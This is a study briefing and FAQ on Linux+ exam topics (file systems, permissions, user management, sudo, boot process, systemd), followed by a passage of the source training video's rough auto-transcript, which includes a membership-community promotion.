    • Services group daemons to provide specific functionality. “service the higher level concept meaning that they group one or more Damons together and that provides a specific functionality”
    • Managing services using systemctl (enable, disable, start, stop, status).
    1. User Authentication and Permissions:
    • /etc/passwd: Stores user account information (usernames, user IDs, etc.). “the Etsy password file stores all of the user names so the user accounts themselves there is no uh password doc uh hashes or any PL text or anything like that that’s inside of this file”
    • /etc/shadow: Stores password hashes (sensitive file, access must be restricted).
    • File permissions (read, write, execute) for owner, group, and others. The acronyms are R, W, and X. “permissions are designed they go by read write and execute and they have acronyms for them so R would be for read W would be for write and then X would be to execute”
    • Special permissions: SUID, SGID, sticky bit. “sticky bit on a directory only the file owner or directory owner can delete or modify the files within it regardless of the group or other right permissions or anything else”
    • sudo and user authentication.
    1. Shell Scripting:
    • Shell scripts are text files containing a series of commands. “shell scripting is a an extension of Shell’s uh interactions and commands that essentially allows you to create a document put a bunch of commands inside of it”
    • Used for automation and repetitive tasks.
    • Key concepts: Shebang line (#!/bin/bash), comments (#), variables, conditional statements (if, else), loops (for, while).

    Quotes of Importance:

    • “toal uh tals posted the source code for free on the web inviting other programs to improve it making Linux a collaborative project and the foundation for open- Source software and to this day it is still open source meaning you can get access to it for free and you can even make modifications to it”
    • “without that guy’s permission you cannot make any incorporations to the Linux kernel uh or at least not publicly shared you could probably make the modifications your yourself but you won’t be able to make it as one of the dros that are available uh to everybody else”
    • “every time that you request a video to be loaded from YouTube you’re requesting a packet of data to be delivered to you and that’s done through your network”

    Recommendations:

    • Reinforce learning with practical exercises and command-line practice.
    • Explore different Linux distributions to understand their specific strengths and use cases.
    • Prioritize understanding file permissions and security concepts to maintain a secure Linux environment.
    • Utilize scripting to automate common tasks and improve efficiency.

    This briefing document provides a comprehensive overview of the Linux training material. By focusing on the main themes and key ideas, it enables individuals to quickly grasp the essential concepts and apply them effectively in real-world scenarios.

    Linux Essentials: Concepts and Architecture

    1. What is Linux and who are some key figures in its development?

    Linux is a free and open-source operating system kernel. Linus Torvalds created it as an alternative to Minix, drawing inspiration from Unix. Richard Stallman and the Free Software Foundation contributed the GNU utilities to the Linux kernel, creating GNU/Linux, the modern version of Linux. Torvalds remains the ultimate authority on the Linux kernel, often referred to as the “benevolent dictator” of Planet Linux.

    2. What are Linux distributions (distros) and what are some popular examples?

    Linux distributions, or distros, are different versions of the Linux OS that bundle the Linux kernel with other software. Popular examples include Ubuntu (user-friendly, for general users), CentOS/Red Hat Enterprise Linux (stable, for enterprise environments), Debian (for servers and advanced users), Fedora (for developers, cutting-edge), and Kali Linux (for cyber security and ethical hacking).

    3. What are some common uses of Linux?

    Linux is used in a variety of environments, including servers, embedded systems/IoT devices, software development, cyber security, cloud computing (AWS, Google Cloud), and data centers. Its versatility and open-source nature make it suitable for a wide range of applications.

    4. What are some important directories in the Linux file system hierarchy?

    Some key directories include:

    • / (root): The top-level directory, the home of everything
    • /bin (binaries): Essential binary executables needed during the boot process or in single-user mode, accessible to all users.
    • /sbin (system binaries): Binary executables for system administration, requiring root privileges.
    • /dev (devices): Represents device files that provide an interface to hardware devices.
    • /home: Contains personal directories for individual users.

    5. What is the /dev directory and why is it important?

    The /dev directory contains device files, which provide an interface for interacting with hardware devices as if they were files. This allows for consistent interaction with various hardware through commands. When you connect a USB drive, for example, a file or folder corresponding to that device appears in /dev, allowing command-line interaction.

    6. How do I determine file system type?

    To determine the file system type the command lsblk -f will display file system type along with UUID and label.

    7. What is shell scripting and why is it useful?

    Shell scripting involves creating text files containing a series of commands that can be executed sequentially. It’s a powerful tool for automation, allowing users to automate repetitive tasks. Shell scripts start with a shebang line (#!) indicating the interpreter to use. The rest of the script contains commands, often with comments (lines starting with #) explaining the code. Control flow structures (if/else, while loops) and variables are essential components of shell scripts.

    8. What are the three key components of the Linux system architecture?

    The Linux system architecture consists of three main components:

    • Kernel: The core component that acts as the bridge between hardware and software, managing system resources.
    • Shell: A command-line interpreter that allows users to interact with the kernel and execute commands.
    • User Space: The environment where user-level applications execute, separate from the kernel for stability and security.

    Linux System Administration Essentials

    Linux administration involves several key aspects, including system architecture, installation, package management, file management, user and group management, process and service management, and job scheduling.

    System Architecture and Boot Process

    • Understanding the Linux system architecture is crucial, including the kernel, shell, user space, basic input/output system (BIOS), Unified Extensible Firmware Interface (UEFI), GRand Unified Bootloader (GRUB), and init system.
    • The file system hierarchy standard (FHS) defines the directory structure, ensuring consistency across distributions. Key directories include root, bin, sbin, etc, home, var, and tmp.
    • The kernel is the core, bridging hardware and software by managing resources.
    • The shell is a command-line interpreter for interacting with the kernel.
    • The boot process involves BIOS/UEFI initializing hardware, the bootloader loading the OS, and the init system starting system services.

    Installation and Package Management

    • Installing Linux involves choosing a distribution based on specific needs, such as Ubuntu, CentOS, Debian, Fedora, or Kali Linux.
    • The installation process includes downloading an ISO image, creating bootable media, and configuring partitions.
    • Package managers are used to update, remove, and troubleshoot software packages.

    File Management

    • File management includes creating partitions and understanding primary, extended, and logical partitions.
    • File systems like ext4 and XFS are also important, as well as understanding mount points.
    • Commands such as mkfs (make file system) are needed for formatting partitions.

    User and Group Management

    • User management involves creating, modifying, and deleting user accounts. Commands such as useradd, usermod, and userdel are used for these tasks.
    • Group management involves creating and managing groups to organize users. Commands such as groupadd and groupdel are used to manage groups.

    Process and Service Management

    • Process management involves understanding daemons, services, and process management commands.
    • Important commands include ps for viewing processes and systemctl for managing services.
    • Job scheduling can be achieved using cron jobs for recurring tasks and the at command for one-time tasks.

    Linux File System Administration: Types, FHS, and Management

    File systems are a critical component of Linux administration, involving how data is stored, accessed, and managed. Key aspects include file system types, the file system hierarchy standard (FHS), mount points, and various management tools.

    File System Hierarchy Standard (FHS)

    • The FHS defines the directory structure in Linux, ensuring consistency across different distributions.
    • Key directories include:
    • Root directory Top-level directory for the entire system. All other directories are extensions of the root.
    • /bin Contains essential user commands.
    • /sbin System binaries, typically for administration, requiring root privileges.
    • /etc Houses configuration files for services and applications. It is known as the control center.
    • /home Houses user directories.
    • /var Stores variable data such as system logs.
    • /tmp Houses temporary data, often wiped on reboot.

    File System Types

    • ext4: The fourth extended file system, is a journaling file system and the default in many Linux distributions. It supports large files and is reliable.
    • XFS: A high-performance journaling file system often used in enterprise environments for its scalability and reliability. It is optimized for sequential read and write operations.
    • NTFS: (New Technology File System) Used in Windows, it’s included because of the need for interoperability between Linux and Windows systems.
    • FAT32: Known for its simplicity and broad compatibility; though older, it is still used due to its cross-platform compatibility. It has a limited file size of 4GB and a partition size limit of 2TB.

    Mount Points

    • Mounting attaches a file system to a directory, making it accessible within the larger directory tree. The mount command is used for this purpose.
    • Automatic mounting is configured in the /etc/fstab file, which defines file systems to be automatically mounted at boot. Each line in /etc/fstab represents a file system and its mount options.
    • Unmounting a file system is done using the umount command, preventing data loss or corruption.

    Partitioning

    • Partitions are logical divisions of a physical storage device, allowing the operating system to manage data in isolated areas.
    • Common primary partitions include the root partition, boot partition, home partition, and swap partition. Most Linux devices break down to a max of four primary partitions.
    • Extended partitions can contain multiple logical partitions.

    Tools and Commands for File System Management

    • mkfs (make file system): Used to format a partition with a specified file system type.
    • lsblk: Lists block devices (disks and partitions) in a tree-like format.
    • fdisk: A command-line utility for creating, modifying, and deleting partitions.
    • fsck (file system check): A utility for checking and repairing file system consistency.
    • parted: A versatile command-line tool supporting both MBR and GPT partition schemes, ideal for resizing and modifying partitions.

    Swap Space

    • Swap space is virtual memory on the hard drive, used when physical RAM is exhausted. It can be a partition or a file.
    • Commands like mkswap (make swap) initialize a partition for use as swap, while swapon and swapoff activate and deactivate swap spaces, respectively.

    Linux Permissions Management: A Concise Guide

    Permissions management in Linux is a fundamental aspect of system administration, focused on controlling access to files and directories. It ensures that only authorized users can read, write, or execute files, maintaining system security and data integrity. The key components of permissions management include permission models, commands for modifying permissions, and special permissions.

    Permission Models

    • Levels of Access: There are three levels of access: owner, group, and others.
    • Owner: Typically the user who created the file or directory, possessing the highest level of control.
    • Group: A collection of users who are assigned specific permissions.
    • Others: All users who are neither the owner nor members of the group.
    • Types of Permissions: Permissions are categorized into read, write, and execute.
    • Read (r): Allows viewing the contents of a file or listing the contents of a directory.
    • Write (w): Permits modifying or deleting a file or directory.
    • Execute (x): Enables running a program or script, or accessing a directory.

    File Permission Representation

    • When viewing file permissions, the output typically looks like this: -rwxr-xr–.
    • The first character indicates the file type: – for a regular file, d for a directory.
    • The next three characters represent the owner’s permissions.
    • The following three characters represent the group’s permissions.
    • The last three characters represent the permissions for others.
    • Example: -rwxr-xr– indicates a regular file. The owner has read, write, and execute permissions; the group has read and execute permissions; and others have only read permissions.

    Commands for Modifying Permissions

    • chmod (change mode): Used to change the permissions of a file or directory.
    • Symbolic Method: Uses symbols to add or remove permissions. For example, chmod u+x file adds execute permission to the owner of the file.
    • Numeric (Octal) Method: Uses numeric values to set permissions. Each permission has a value: read=4, write=2, execute=1. The sum of these values represents the permissions. For example, chmod 755 file gives the owner read, write, and execute permissions (4+2+1=7), and the group and others read and execute permissions (4+1=5).
    • chown (change owner): Used to change the owner of a file or directory.
    • chgrp (change group): Used to change the group associated with a file or directory.

    Special Permissions

    • SUID (Set User ID): When set on an executable file, it allows the file to be executed with the privileges of the owner, not the user running it. It is represented by an “s” in the owner’s execute permission slot.
    • SGID (Set Group ID): Similar to SUID, but it applies to the group. When set on a directory, any files created within that directory inherit the group ownership of the directory.
    • Sticky Bit: When set on a directory, only the file owner or directory owner can delete or modify files within it, regardless of group or other write permissions.

    User Authentication

    • /etc/passwd: Stores user account information, including usernames, but no password hashes.
    • /etc/shadow: Stores encrypted password hashes and other security information. Should only be readable by the root user.

    Managing Pseudo Permissions

    • Granting users the ability to execute commands with root privileges via sudo is a critical aspect of system administration.
    • This involves adding users to the sudo group and configuring the /etc/sudoers file to define command restrictions.
    • The visudo command is used to safely edit the /etc/sudoers file, checking for syntax errors before saving.
    • Within the /etc/sudoers file, you can specify which commands a user can run with sudo. For example: username ALL=(ALL:ALL) /path/to/command. This setup ensures users have the necessary permissions to perform administrative tasks while maintaining security.

    Linux User Management: A System Administration Guide

    User management in Linux is a critical aspect of system administration. It involves creating, modifying, and deleting user accounts to control access to the system and its resources. Effective user management ensures system security and integrity by granting appropriate permissions and privileges to different users.

    Key aspects of user management include:

    • Creating Users: User accounts can be created using the useradd or adduser command, depending on the Linux distribution.
    • The basic syntax is sudo useradd username or sudo adduser username.
    • Additional options can be used to specify the home directory, login shell, and supplementary groups for the user.
    • For example, sudo useradd -m -d /data/users/alice -s /bin/bash -G developers,admins alice creates a user named “alice”, assigns the home directory to /data/users/alice, sets the login shell to /bin/bash, and adds the user to the “developers” and “admins” groups.
    • Setting Passwords: After creating a user, a password must be set using the passwd command.
    • The syntax is sudo passwd username.
    • It is common practice to expire the initial password, forcing the user to set a new password upon their first login. This can be done using a specific command to expire the password immediately after it’s been created.
    • Modifying Users: Existing user accounts can be modified using the usermod command.
    • This command can change the username, lock or unlock an account, and modify group memberships.
    • For example, sudo usermod -l newusername oldusername changes the username from “oldusername” to “newusername”.
    • The -L option locks an account, and the -U option unlocks it.
    • Deleting Users: User accounts can be deleted using the userdel command.
    • The syntax is sudo userdel username.
    • The -r option removes the user’s home directory and all its contents. For example: sudo userdel -r username.
    • Groups:
    • Groups are managed using commands such as groupadd to create groups and groupdel to delete them.
    • A primary group is the main group associated with a user. When a user creates a file, the group ownership of that file is set to the user’s primary group.
    • Supplementary groups are additional groups that a user is a member of, granting them access to resources associated with those groups.
    • A user can be added to a supplementary group using the usermod command with the -aG option. For example: sudo usermod -aG groupname username.
    • File Permissions and Ownership:
    • Every file and directory in Linux has associated permissions that determine who can read, write, or execute the file.
    • Permissions are defined for the owner, the group, and others.
    • The chmod command is used to modify permissions, chown to change the owner, and chgrp to change the group.
    • Special Permissions:
    • Special permissions like SUID, SGID, and the sticky bit can be set to modify how files are executed or accessed.
    • SUID allows a file to be executed with the privileges of the owner.
    • SGID, when set on a directory, causes new files and subdirectories to inherit the group ownership of the parent directory.
    • The sticky bit, when set on a directory, restricts file deletion and modification to the owner of the file, the directory owner, and the root user.
    • User Authentication Files:
    • The /etc/passwd file stores basic user account information, such as usernames, user IDs, group IDs, home directories, and login shells. However, it does not store password hashes.
    • The /etc/shadow file stores encrypted password hashes and other password-related information. It should be readable only by the root user.
    • Managing Sudo Permissions:
    • Granting users the ability to execute commands with root privileges via sudo is a critical aspect of system administration.
    • This involves adding users to the sudo group and configuring the /etc/sudoers file to define command restrictions.
    • The visudo command is used to safely edit the /etc/sudoers file, checking for syntax errors before saving.
    • Within the /etc/sudoers file, you can specify which commands a user can run with sudo. For example: username ALL=(ALL:ALL) /path/to/command. This setup ensures users have the necessary permissions to perform administrative tasks while maintaining security.

    Linux System Boot Process: BIOS, Bootloader, and Initialization

    The system boot process in Linux involves several stages, starting from the hardware initialization to the loading of the operating system. Key components and processes include BIOS/UEFI, bootloaders, and initialization systems.

    • BIOS/UEFI:
    • BIOS (Basic Input/Output System) is a firmware used in older systems to initialize hardware and pass control to the bootloader.
    • BIOS initializes the hardware and conducts a Power-On Self-Test (POST) to check hardware.
    • It issues beeps to indicate test outcomes and initializes essential hardware like the keyboard, mouse, and disk drives.
    • UEFI (Unified Extensible Firmware Interface) is a modern interface replacing BIOS, offering a more flexible, faster, and secure boot process.
    • UEFI can boot systems faster and supports a user-friendly graphical interface.
    • It enhances security with features like secure boot, protecting the system from malicious software attacks, and supports larger disk drives.
    • UEFI also allows booting from network resources, facilitating remote system deployment and management.
    • Both BIOS and UEFI perform POST, execute the bootloader, and initiate the operating system boot.
    • Bootloader (GRUB):
    • The bootloader acts as an intermediary between the BIOS/UEFI and the operating system.
    • GRUB (Grand Unified Bootloader) is commonly used in Linux distributions.
    • It takes control of the system after BIOS/UEFI and completes the boot process.
    • GRUB loads the kernel and initial RAM disk into memory and transfers control to the kernel.
    • It presents a boot menu, allowing users to choose an operating system in dual-boot or multi-boot systems.
    • GRUB supports multiple OSs, customization of the boot menu, secure boot options, and advanced features like chain loading and network booting.
    • Initialization Systems (SysVinit, systemd):
    • After the bootloader, the system uses an initialization system to start system services and processes.
    • SysVinit is a traditional init system using a sequence of scripts to bring up the system, but it can be complex to configure and is relatively slow due to its sequential processing.
    • It runs scripts located in /etc/init.d to start and stop services.
    • SysVinit uses run levels, each representing a specific system state.
    • systemd is a modern init system that is faster, more flexible, and more feature-rich than SysVinit.
    • It manages the lifecycle of system services, ensures services start in the correct order based on dependencies, and logs system events.
    • systemd starts services in parallel, reducing boot time, and manages dependencies automatically.
    • It provides a unified framework for managing system services and includes features like socket activation, journaling, timers, scheduling, and device management.
    • systemd uses boot targets, which are groups of services that should be started or stopped together, allowing efficient management of system behavior under different circumstances.
    • Run Levels and Boot Targets:
    • Run levels (used in SysVinit) represent specific states of the system, with the system transitioning through them during the boot process.
    • Common run levels include halt (0), single-user mode (1), multi-user mode without NFS (2), multi-user mode without GUI (3), full multi-user mode with GUI (5), and reboot (6).
    • Boot targets (used in systemd) replace run levels and represent groups of services to be started or stopped together.
    • Common targets include multi-user.target (default multi-user mode), graphical.target (graphical services), rescue.target (system recovery), and emergency.target (minimal services for system maintenance).
    • Service Management:
    • In systemd, services are managed using systemctl commands.
    • Common commands include sudo systemctl start service, sudo systemctl stop service, sudo systemctl enable service, sudo systemctl disable service, and systemctl status service.
    • In SysVinit, the service command is used with similar options but a slightly different syntax.
    Full Linux+ (XK0-005 – 2024) Course Pt. 1 | Linux+ Training

    The Original Text

    Tesla cars the Google search engine and Gmail the astroe robots from NASA PlayStation and Xbox the trading systems at the New York Stock Exchange as well as many other popular services around the world run on Linux this means that there’s a lot of benefit to you learning Linux and the base certification for Linux is the Comas Linux plus even if you don’t plan on getting your Linux plus certification this video will help you to develop your Linux skill set and being that this channel is all about cyber security and hacking learning Linux will make you a much more capable security pro and a force to be reckoned with that being said here’s the outline of what we’ll be covering in this tutorial this training series is sponsored by hackaholic Anonymous to get the supporting materials for this series like the 900 page slideshow the 200 Page notes document and all of the pre-made shell scripts consider joining the agent tier of hack holic Anonymous you’ll also get monthly python automation exclusive content and direct access to me via Discord join hack alic Anonymous today are a couple of quick notes the format of the training series is going to be half lecture and half practical commands that we actually run inside of Linux on the command line um as you can see over here we have a bunch of content so it goes up to chapter 11 as far as the lecture portion itself is concerned and we’ll be covering essentially everything that you see inside of this notes document this uh Google doc as well as these 800 something slides that I have here for you in the Google Slides presentation so that’s going to be the part about of the lecture of this particular training series there is going to be a section on chapter 3 where we actually go through the installation of Linux and it’s something that I want to go through with you so you actually have a lab environment just in case you don’t have Linux on your computer and uh you don’t have Mac OS and Mac OS can be kind of similar to Linux but I want you to actually practice inside of a Linux environment so we’re going to go through the installation portion of it and that’ll be similar to a practical uh example that I’ll give you so that we can just go Click by click so you can see how to download an ISO file and uh go ahead and install it for yourself and essentially set yourself up to run all of the commands that we’re going to end up running when we actually do get to the Practical portion of this but for the most part it’s going to be broken down into a lecture and then at the very end of it when we get to chapter 12 we’re going to get to all of the commands that we have and then for chapter 12 there’s individual sections as well that has all of the uh the individual commands that we’re going to run that will just break down into multiple sections under chapter 12 so there’s actually 12 subsections inside of chapter 12 that goes everything from getting system information all the way to getting scripting and learning about how to create shell scripts so that’s going to be the outline that we have or the format of the outline that we have over here the second note that I want to give give you is that you can actually get this document this Google document with all of its notes and all of the commands and everything that’s for the lecture as well as this Google Slides presentation and it’s 800 something slides you can get access to both of these things by being a member of our hackaholic synonymous membership community so if you’re actually an agent tier member or above you will get access to this as a part of your membership and in my opinion it’s actually very very valuable um the video is obviously available to you for free um most likely it’s going to be broken down to two videos because when we get actually get to the Practical section I think I have to break it down into its own series of videos or at least its own separate video because uh Google Maxes us or Google YouTube Maxes us out at the uh 12-hour Mark so just in case we go over 12 hours for this training series I’m going to break it down into two uh separate videos but you will get access to those videos absolutely for free if you wanted to get the docs uh notes as well as the slides it would be part of the hack Anonymous membership and just to give you an idea of what that looks like as far as the the price comparison of what you can expect if you want to com Tia to try to get their Linux plus uh education just for the exam voucher itself it’s $369 but everything else so for example if you wanted to do the the labs and their education uh videos as well as the notes that they would give you and everything else that would be 1165 and then you have these various bundles as well so you’re looking at at least several hundred uh if you wanted to get it through Linux plus uh from CompTIA or really anything that would be comparable to this particular education uh what I’m giving you in these notes as well as the slideshow is based on the exact outline that they have in the CompTIA Linux plus education so that you can be ensured that you’re getting everything that you need for your examination but you literally get it at a fraction of the price probably less than on10th of the price so that’s really the entire plug that I have over here is that if you actually wanted to get these notes as well as the slides you can get it by being a member of the hackaholic anonymous membership community and the link to that is below in the description now that being said let’s actually jump into this outline so you know what to expect okay so first and foremost the timestamps that are going to be attached for this presentation are going to be in the description below as well as the very first comment that will be pinned to the top of the comment section and I’m going to try to give you as many time stamps as possible without making it ridiculous and being too specific so um the time Stamps will be brok broken down and then this is the the outline of this uh course so number one obviously we’re going to go into the intro to Linux and then Linux plus certification which means you’ll get the overview of the history of Linux the distributions that are available and the Linux plus certification itself what the benefits would be for you and more importantly the structure of the Linux plus examination which means the categories that are going to be covered and the format of the exam and any prerequisites that would be required to make sure that you do very well on this training series as well as if you decide to go take the certification exam so that you can do well on the examination uh the second chapter second section is going to be all of the system architecture and the brute process property so this is very similar to what happens if you got an education in comp plus but of course we’re not going to go into the nitty-gritty the super in-depth stuff it’s going to be all the things that you would need to understand Linux as well as the kernel and the shell and the user space and the basic input output system and ufv and Grub and the init system so on and so forth so you’re going to get a good understanding of what these things are and how they relate to Linux then we’re going to go into the actual installation of Linux and you’ll learn how to install Linux on a USB drive so you can have a live boot as well as a full installation if you wanted to install it on a computer to have as a secate second operating system or if you just want to start installing Linux on a variety of machines if you got hired to be a Linux administrator that’s essentially what they might ask you to do is to install Linux on actual computer so that the computer runs on Linux so you’ll learn that entire uh installation process and then we’re going to go through the partitions and the file systems so you know how you can create partitions and what primary partitions are and what extensions are so on and so forth we’ll go through the package managers and of course updating removing and troubleshooting packages then we’re going to go through the basics of the command line now this is just going to be again a part of the lecture itself all of the commands that you’re going to learn in every other section that we talk about will be covered inside of the the Practical portion of this training series and we’re going to go in depth and you’re going to try so many different versions of the commands and you’ll get a really really good training on it and a good understanding of it so I don’t want you to think that just because we’re going to skim them and you know introduce you to the commands for these various sections that we’re not going to actually go and practice them when we get to the Practical section so this is going to be the basics of the command line as well as the text editors and manipulating files and creating basic uh basic shell scripts and what the the various portions or the various elements of a shell script are then we’re going to go into user and group management how to create and manage users and groups the file permissions and ownerships and access control list and things like that special permissions and of course authentication and pseudo permissions that will come to that specific section and then we have the file management and file system so this is actually going deeper into the file systems we had the introduction to file systems when we were over here but over here we’re actually going to go in depth for the file systems and how to mount and unmount a file system how to actually create a file system using uh Fisk or the M mkfs the make file system commands and how to create partitions configuring in those things uh of course and managing the swap spaces as well because that’s actually a separate partition as well so you you’ll get all the understanding that you need for file management and the file systems and how to create file systems and partitions so on and so forth uh we’re going to go into process and service management so so this is also very important as a Linux administrator all of this stuff is actually really important as a linuxis admin so um we’re going to go into the process and service management portion uh understanding what a Damon is what services are uh Process Management commands service management commands and of course scheduling jobs and then we’re going to go into networking so this is not going to be a replacement of the network plus training that you can get but we will go into enough that you will be dangerous so you’ll learn enough about networking that you will know exactly how to navigate the network infrastructure and how to set up the IP addressing and the DNS and dynamic host configuration protocols and how to actually uh create the network manager CLI or how to use the network manager CLI and how to troubleshoot uh network issues and of course managing the firewalls with the basic firewall which is the uncomplicated firewall as well as the IP tables so we’ll go into a good amount of stuff so that you you know enough to be dangerous right but we’re not it’s this is not going to subst intitute the network plus education cuz that’s a whole other Beast by itself and then we have security and access management so this is another very important element uh this is a channel about cyber security and hacking so security is a very very big deal to me so this is going to be something that I’m very interested in sharing with you and file system security C trud file permissions Access Control lists network security user authentication methods and configuring secure shell data encryption and secure file transfer and a lot of other things that would fall under the category of security and access management and then we’re going to go through troubleshooting and system maintenance and these are all the different elements so analyzing interpreting log files dis usage analysis backup and restoration strategies and of course system performance monitoring and then there’s virtualization and Cloud Concepts now this was not listed as an actual uh category under Linux plus but I think this is very important for you to learn because most likely if you’re going to get a job as a Dev ops manager or somebody who will go into Dev Ops or somebody who’s going to become a linuxis admin you are most likely going to deal with a cloud environment because companies these days aren’t really setting up physical servers anymore they’re most likely going to go and buy a virtual server with uh let’s say aw or with Google cloud or something like that and you’re going to need to learn how to uh essentially just navigate those things it’s not really complicated to understand and the command line and everything that’s associated with this isn’t really complicated but I just want you to understand and I want you to know how these things work and you know what is a virtual machine and what is a container for example and how do you use Virtual box or Docker these various tools that are associated with Cloud Concepts and cloud computing so it’s not uh required for Linux plus but I think you will be more powerful as a Linux administrator and if in case it does show up because by the time that you watch this video they’ve added it to the most updated version of the Linux examination in case it does show up you’ll know what you’re talking about and you’ll be ready for that as well and then finally we’re actually going to get into the practice command portion which is a massive portion all by itself and of course exam preparation tips so there will be the key commands for the Linux plus exam there’s going to be exam preparation resources like practice labs in addition to everything we’re going to talk about mock exams study guides I’ll give you a bunch of mock questions that you will need to kind of review just to prepare yourself for the examination and of course uh the exam day tips and how to just prepare yourself for that day and the final wrapup that we’ll go through so this is going to be a comprehensive training course I really wanted to be very useful for you whether or not you take the examination so whether or not you decide to become certified should not matter because by the end of this thing you should be so functional and you should be so competent with Linux that even if you’re not certified you can do all of the requirements of any Linux sis admin job and then you can confidently put that on your resume and even on your portfolio and say look at all of the stuff all of these shell scripts that I created and all of the various things that I can do inside of Linux so that you can just prove that you’re competent and you’re actually proficient in Linux so I’m really excited for you I’m glad that you’re here I hope you go through the entire thing but in case you want to skip around and find individual sections that would be relevant to you the time stamps are all going to be below and that’s about it so I feel like I was talking a mile a minute minute cuz I’m trying to get through this whole thing so quickly to be able to save on time you probably don’t need to speed up this presentation cuz I’m going to try to talk really really fast to just just try to get as much content uh crammed into this video as humanly possible so uh I’m excited for you I hope you’re excited too let’s jump into the very first section okay here we go so introduction to Linux and the Linux plus certification uh overview of the history dros and of course the common uses so I was created in 19 1991 by lonus tals who developed Linux as a hobby while studying at the University of Helsinki I don’t know what you do as a hobby but this guy created an entire operating system um the goals for this were to make it free make it open source alternative to Minix uh which was based on Unix and that’s the guy lonus tals he’s still around and he’s still the the father of Linux um inspired by Unix which was created by Maurice Bach uh version 02 of Linux kernel was released in 91 and then 1.0 was released in ’94 toal uh tals posted the source code for free on the web inviting other programs to improve it making Linux a collaborative project and the foundation for open- Source software and to this day it is still open source meaning you can get access to it for free and you can even make modifications to it so long as your modifications get approved by the father of Linux uh richel stalman uh who’s an American and the the free software Foundation created the gnu which was the open source Unix like OS and then they added the gnu utilities to the Linux kernel to create the gnu Linux or the modern version of Linux that you see uh when you interact with Linux or uh when any of these companies that we mentioned at the beginning of the video when they create it or they use it uh that’s the version of Linux that they’re using so it’s the most updated version of Linux and that’s the guy Richard stalman he definitely that’s like the best picture that I found of him all of the other pictures are not flattering at all and he looks like a mountain man pretty much in every single one of these pictures and it’s interesting to see that like this is one of the guys that’s like the a tech uh nerd that was like the one of the founding uh people of Linux so it’s actually it’s really interesting to see the different types of people that you see inside of the tech world so yeah this is Richard stalman so then what happened was Linux became a complete Unix clone now it’s used everywhere as you saw uh torval Remains the ultimate Authority on what new code is incorporated into the Linux kernel and AKA he is known as the benevolent dictator of Planet Linux and the best picture that I could find to bought you know exemplify that to embody that was that picture right there so without that guy’s permission you cannot make any incorporations to the Linux kernel uh or at least not publicly shared you could probably make the modifications your yourself but you won’t be able to make it as one of the dros that are available uh to everybody else so uh that is what we got for the history of Linux now these are the popular Linux distributions and the various purposes that they hold Linux distributions AKA dros are different versions of Linux OS that bundled the Linux kernel with other software so you have the Linux kernel as the base and then you have a variety of different additions to it that create various distributions so for example we have Ubuntu which is the most commonly used uh it’s popular for General users beginners and people who want to use Linux in the desktop environment and it’s used or it’s known for user friendliness right so it actually has a GU and you get point and click and a lot of cool things that come pre-installed with it uh but Ubuntu is the most popular in my opinion and it was like the first introduction when I uh heard about Linux and I was looking at the software that was installed the OS that was installed it was Ubuntu Dro that was installed and then we have sent OS AKA Red Hat Enterprise Linux or real and these things are used in Enterprise environments so they’re mainly for stability and support so there’s actually a support team there’s a dedicated support team that the company can hit up and get their questions answered and it’s very very stable and it’s good for large environments so Enterprise environments use Cent OS and then Red Hat Enterprise Linux and then we have Debian and Debian is known for servers and advanced users mostly because the fact that you’re not going to get a graphic user interface there are some installments that do have it but for the most part it’s just a black screen with a bunch of command line comments that are on it and this is used for Server so this is a very very big one in the server environment and then we have Fedora which is great for developers and it’s more Cutting Edge and it has a lot of Innovations and utilities that are pre-installed on it and this is again for people who want to go into development and coding and software development etc etc that would be Fedora and then finally last but not least is my favorite which is Cali Linux and that logo is just absolutely amazing I love C Linux and it’s for cyber security and ethical hackers which is US everybody that comes on this channel we are all cyber security people and ethical hackers and we use C Linux and Cali Linux also has auntu installed on it but it comes pre-installed preconfigured with a bunch bunch of cyber security tools and a bunch of ethical hacking tools and Pen testing tools and it is my favorite version of Linux I’m biased obviously I love all of Linux I think it’s an amazing OS but this is definitely mine this is my favorite one and uh that is it for the the majority of the popular dros there are some other dros as well that you will see as we go into uh some of the links for being able to download these things but these are the most popular and uh you can just do a Google search to see what all different distributions are as far as the common uses of Linux we already kind of touched on them through the disos but you have you know servers embedded systems and iot devices iot devices are internet of things so it could be a smart Appliance like a microwave or something or a fridge or something it could be a router it could be cars like the Tesla cars it could be the aobi robots it could be uh so many different things that would be considered an embedded system or an iot device and then you have software development and cyber security obviously and then we have cloud and data center so AWS and Google Cloud actually use Linux uh devops and Cloud architecture all of those things are centered around Linux actually the only uh platform that I don’t think uses Linux for cloud computing is Microsoft Azure uh but they even have uh kind of like a integration with Linux that you can actually use to go into it as well so um for the most part Linux is the the primary OS uh that is used for a lot of these things it’s believe it or not it’s massive there’s so many different entities and so many different platforms and software and equipment and systems that use Linux so uh you’re in a good place by studying this you are adding a very important skill set that I think is going to be very relevant uh for many many years to come for decades to come probably uh assuming that the human race is still around so a very very good skill set to have just so you know what the benefits are by this certification for it professionals even if you don’t get the certification and you just get really good at Linux and you can put on your resume and on your portfolio that these are all the different things that you can do and uh for the the exercises that we run you’re going to get some output results so you can develop scripts and you can do a lot of different things that will demonstrate your skill set on this um but there are a lot of benefits to it so obviously there’s industry recognition obviously there is career advancement opportunities so it’s recognized Glo so Linux plus is actually a globally recognized certification and it’s very valued in it roles as a system admin as somebody in devops or cyber security and cloud computing uh it’s an entryway so it’s a Gateway it’s uh getting your foot in the door for professionals who are seeking to specialize in linux-based systems it validates your skills it has a lot of Versatility to it so system configuration troubleshooting security as we’ve just touched on employers really appreciate app people who actually have certifications or at the very least understand fundamentals and practical uses of Linux and in my opinion it’s the Practical side of everything that is the most important I know a lot of people who don’t have the degrees who don’t have the certifications but are very very capable and really good at these things that are getting hired in very big roles andc it’s mainly because of the fact that if you put on your resume that you can do something as a part of the application process they’re going to have you go through some kind of an assessment and the assessment is going to test your skills in Linux and if you actually know what you’re doing they don’t care whether or not you have the certification they just want to know that you know what you’re doing and you know how to navigate these types of environments so it’s very very important in validating those skills and of course there’s competitive advancement and salary potential so if you actually if you know what you’re doing and if you know Linux versus somebody who doesn’t know know Linux you will get paid a higher rate you can find some really nice salaries for people who know how to interact with Linux and Linux plus certification just kind of is that seal of approval to make sure that you actually know it but you know there’s this really great quote that says uh you know what do you call somebody who got a D in med school you call him doctor and so even if somebody got a Linux plus certification it doesn’t mean that they scored super high on that certification exam it just means that they got at least the bare minimum score to be able to pass it and then they got that search so you could for the most part A lot of people again could just be self-taught and without the certification but they know a lot of Linux uh interactions and environments and fundamentals and advanced scripting and so on and so forth that they actually are more knowledgeable than people who got theer so just kind of keep that in mind okay so here is the structure of the Linux plus exam the exam format uh currently the xk5 as of 20 24 so uh the time of this recording is November 2024 uh it consists of approximately 90 questions including multiple choice and performance-based 